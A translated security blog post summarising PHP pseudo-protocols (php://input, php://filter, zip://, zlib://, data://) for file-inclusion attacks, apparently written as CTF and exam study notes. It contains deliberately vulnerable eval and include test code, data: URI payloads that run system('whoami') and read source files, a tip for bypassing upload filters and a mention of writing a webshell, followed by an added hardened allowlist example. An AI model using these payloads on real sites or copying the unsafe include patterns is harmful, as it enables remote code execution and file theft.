Summary of PHP pseudo protocol of cisp-pte
2022-07-05 16:42:00 【Colorful @ star】
PHP Pseudo protocol summary
0x00 php://input
// All tests were run with allow_url_fopen=On and allow_url_include=On.
php://input is a read-only stream that gives access to the raw data of the request. For POST requests it is preferable to use php://input instead of $HTTP_RAW_POST_DATA, because it does not depend on special php.ini directives. Moreover, in the cases where $HTTP_RAW_POST_DATA is not populated by default, it potentially needs less memory than activating always_populate_raw_post_data. php://input is not available with enctype="multipart/form-data".
——php.net
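Simply put, it reads the raw POST data.
Test code:

File inclusion with a variable, leading to command execution:
Test code:
<?php
$d = file_get_contents('php://input'); // raw request body
//echo $d;
@eval($d); // intentionally unsafe test code: runs the request body as PHP
?>
<?php @include($_GET["file"]); /* intentionally unsafe test code: includes whatever stream "file" names */ ?>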

Writing a one-line webshell:

0x01 php://filter
php://filter is a kind of meta-wrapper designed to permit the application of filters to a stream at the time of opening. This is useful with all-in-one file functions such as readfile(), file() and file_get_contents(), where there is otherwise no opportunity to apply a filter to the stream before the contents are read.
——php.net
Simply put, it is most often used with the base64 encoding filter, for example:
php://filter/read=convert.base64-encode/resource=file:///c:/windows/win.ini
A variety of filters can be used (string / conversion / compression / encryption).
It is often used to read files or source code:

0x02 zip://,bzip2://,zlib://
zlib: works like gzopen(), except that the stream can also be used with fread() and the other filesystem functions. It is deprecated as of PHP 4.3.0 because of ambiguities with filenames containing ":" characters; use compress.zlib:// instead.
compress.zlib:// and compress.bzip2:// are equivalent to gzopen() and bzopen() respectively, and they work even on systems that do not support fopencookie.
The ZIP extension registers the zip: wrapper. As of PHP 7.2.0 and libzip 1.2.0+, password support for encrypted archives was added, allowing passwords to be supplied to streams. Set the password in the stream context using the 'password' option.
Options:
- zlib://file.gz
- bzip2://file.bz2
- zip://archive.zip#dir/file.txt
——php.net
Simply put, these wrappers give direct access to files inside a compressed archive.
1. zip://
Compress phpinfo.txt into a zip archive. In practice, the extension can be changed to jpg to bypass upload restrictions.
Note that an absolute path is needed and the # must be URL-encoded.

2. zlib://

Changing the extension to jpg also works, and a relative path is acceptable too.
3. bzip2://
Works the same way as zlib://.
0x03 data://
data://text/plain;base64,

It also works without the //.
It can also be used to read PHP source code:
data:text/plain,<?php system('cat /var/www/phprotocol1.php')?>
Or for command execution:
data:text/plain,<?php system('whoami')?>
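Every technique above depends on the include($_GET["file"]) test code handing a caller-chosen string to a stream wrapper. The following is an added example, not code from the original post, of a hardened replacement that maps the parameter through an allowlist and logs wrapper attempts; the function names, the page names and the temporary directory are assumptions made for the demonstration.

```php
<?php
// Added example, not from the original post; all names and paths are assumptions.
declare(strict_types=1);
// Matches a leading stream-wrapper scheme: php://, zip://, compress.zlib://, data: ...
function has_wrapper_scheme(string $value): bool
{
    return preg_match('/^[a-z][a-z0-9+.\-]*:/i', $value) === 1;
}

// Map a request parameter to a file inside $baseDir, or null if it is not allowed.
function resolve_page(string $name, string $baseDir, array $allowed): ?string
{
    // Exact allowlist match: wrapper URLs and ../ traversal never get past this.
    if (!in_array($name, $allowed, true)) {
        if (has_wrapper_scheme($name)) {
            // Encode before logging so the value cannot inject log lines.
            error_log('include blocked, wrapper scheme: ' . rawurlencode($name));
        }
        return null;
    }
    // Defence in depth: the resolved path must exist and stay under $baseDir.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $name . '.php');
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo: a temporary page directory and inputs shaped like the post's.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'pages_' . getmypid();
mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'home.php', "<?php echo 'home';\n");
$inputs = [
    'home',
    'php://input',
    'php://filter/read=convert.base64-encode/resource=index.php',
    'zip:///var/www/upload/a.jpg%23phpinfo.txt',
    'compress.zlib://upload/a.jpg',
    'data:text/plain;base64,AAAA',
    '../../etc/passwd',
];
foreach ($inputs as $input) {
    $ok = resolve_page($input, $dir, ['home', 'about']) !== null;
    printf("%-62s %s\n", $input, $ok ? 'allowed' : 'rejected');
}
unlink($dir . DIRECTORY_SEPARATOR . 'home.php');
rmdir($dir);
```

Setting allow_url_include=Off stops include() from opening php://input and data:, but php://filter, zip:// and compress.zlib:// are not governed by that setting, which is why the check is an allowlist rather than a configuration change alone.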
0x04 Conclusion
PHP pseudo-protocols come up often in CTFs, and they can also be surprisingly effective in real engagements.

0x05 Reference material
https://www.waitalone.cn/php-file-include.html
www.freebuf.com/column/148886.html
http://php.net/manual/zh/wrappers.php
</article>